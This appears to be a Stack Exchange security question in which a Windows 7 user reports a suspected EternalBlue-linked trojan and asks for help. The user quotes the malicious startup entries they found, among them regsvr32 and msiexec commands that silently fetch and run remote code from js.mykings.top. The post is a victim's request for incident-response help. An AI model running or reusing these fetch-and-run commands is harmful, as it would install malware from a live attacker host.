3

Sorry if I messed up in any manner, e.g. title, details, tags, layout, venue, response plan, etc. I know a little of the stacks and security in general.

Short Version:

  • I found material on my other machine which almost certainly is an EternalBlue related infection.
  • Evidence suggests it's mostly likely either a variant of Petya ransomware, or a spying & control trojan (Cyphort, Symantec).
  • No damages are visible so far, and can't tell if infection is active, waiting, or dead.
  • Would like advice on how to progress.

Events: Yesterday I booted up my other machine to be greeted with a "virus (Skeeyah) found & quarantined" message from my AV (MSE). Apparently Skeeyah is a type of "trojan", which is stuff that has full spying and control capacity on the victim machine, no restrictions.

Due to past experiences, I decided to manually revise my machine's condition, and I saw some initial red flags which made me immediately power off my machine & disconnect its network cable, then go into Safe Mode. Follow-up investigation suggests the initial red flags were false-positives after all. However, I found actual red flags during the same follow-up.

Actual Red Flags: They are five msconfig entries on the "Startup" tab, listed below & ordered by suspicion level (hope table renders fine):

Startup Item                             | Manufacturer          | Command                                                      | My File Search Results
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Microsoft(R) Windows(R) Operating System | Microsoft Corporation | regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll | Can find scrobj.dll in a few places but not in said path, modified in 2009.
Windows Installer - Unicode              | Microsoft Corporation | msiexec.exe /I http://js.mykings.top:280/helloworld.msi /q   | Cannot find helloworld.msi <eom>
uplimex                                  | Unknown               | rundll32.exe "[AppDataPath]\Local\uplimex.dll",uplimex       | Can find uplimex.dll in said path, modified 27th of June.
Softonic                                 | Unknown               | [AppDataPath]\Roaming\Softonic\Softonic.com                  | Cannot find Softonic.* <eom>
BeyluxeMessenger                         | Unknown               | "[ProgramFilesx86Path]" /hide                                | Cannot find bey*.* <eom>
  • Two URLs take the lead. Searching the web for them showed MANY non-English sites (which I skipeed), but also two articles by Cyphort and Symantec, relating these URLs to "trojan" infections that utilize EternalBlue's exploit, and their impact seem as bad as the Skeeyah noted before.
  • Next is this uplimex, don't know it, can't find it on the web, and it doesn't look cool, especially that the file's modified date matches one of the Petya ransomware attacks, which uses the EternalBlue exploit that was just mentioned (isn't OS modify date easy to fabricate though?).
  • Then there's Softonic stuff, I probably accessed the website many times but don't remember downloading stuff specific to them.
  • Lastly, BeyluxeMessenger. Name is familiar, maybe I had it in the past but not right now. Just in case it's related to infections I thought of mentioning it.

Machine Status Around/After Finding Red Flags:

  • It probably stayed running for 30 minutes before false-positive red flags were spotted, at which point I switched it to Safe Mode for the next 90 more minutes before I powered down.
  • I didn't get to run a full AV scan yet, and it seems AV cannot launch Real-Time Protection while in Safe Mode.
  • Did not check the firewall's current condition, however access to Task Manager and regedit seem fine.

My Security Level: Microsoft Security Essentials (MSE) and Windows Firewall on a Windows 7, although to be honest the first two are not always active and now I'm suspecting the 3rd might not be up to date. Gotta check all of that.

Initial False-Positive Red Flags: Some process showing up on Task Manager then disappearing, named DAO.22501899.exe, pathed under [AppDataPath]\Local\NVIDIA\NvBackend\Packages\0000a540\, as well as many files in adjacent folders mostly named either vops-[gamename].[somenumber].exe or streaming-assets-[gamename].[somenumber].exe. Although, upon coming across this article, I suppose that general directory is expected to have such stuff?

Questions:

  • State & Impact:

    • Any idea what infections do/did I have? Is it all just Skeeyah remanents or there is more to deal with?
    • Can their activity state be recognized? (i.e. active, waiting, dead)
    • Any idea on their damage scope?
      • Skeeyah was busted yesterday, but did it land yesterday or like 17 years ago?
      • Would Ransomware encrypt systematically? I mean, does it seek to finish directories it started in for example, or does it encrypt simultaneously all over the place?
      • Identifying ransomed files? I suppose they'd either look corrupt (though actually encrypted) or something in their name, neighbors or upon usage would indicate they've been ransomed, correct?
      • Trojans' scope? I should assume all data, including passwords, logs, history, screen/mic/cam output has been compromised, although contents of well-encrypted files would be safe from acquisition, correct? What else to worry about?
    • Entry point? My understanding is that for EternalBlue, there's a certain Windows update to safeguard against it, and the machine could well have been out of date on that. If the update was there though, or this wasn't EternalBlue, any specific possibility other than the usual "bad file downloaded"?

  • Resolution/Follow-Up:

    • Can I trust MSE that it handled Skeeyah and in time? Or is it possible Skeeyah was there long ago? Or could MSE have missed something?
    • What follow-up do I have? All that I can think of is a full scan by MSE, then replacing it with Symantec and full-scanning by that too, then manually disabling msconfig entries and deleting corresponding files.
    • How safe is Safe-Mode in these scenarios? I heard it can be blocked, but how easy/hard is that? And if it is accessible, how much does it protect? What if networking/command was also enabled?
    • How useful is monitoring processes via Task Manager? It helped me several times in the past, can't tell if it's just luck or for real though. How easy/hard it is to find weird names or high CPU usage there? How easy/hard it is to impose as usual legitimate processes? Is there enough timeframe for a problem to be spotted by a person?

Sorry for the long post, I tried my best to include all what's necessary and summarize/lay it all out in a nice format. Many forward thanks for your time & contribution.

KtX2SkD
  • 131
  • 2
  • Apologizes again, wrote this across hours from a setup really bad to use for that long. I'll try gather my focus for a conscious double-check. Two votes to enable links would be great. – KtX2SkD Jul 20 '17 at 20:20
  • 2
    `What follow-up do I have?` - Nuke it from orbit. The machine has been compromised and cannot fully be trusted no matter what remediation steps you take. You need to wipe the drive and start with a fresh installation and hope your MBR isn't hosed. – DKNUCKLES Jul 20 '17 at 20:28

0 Answers0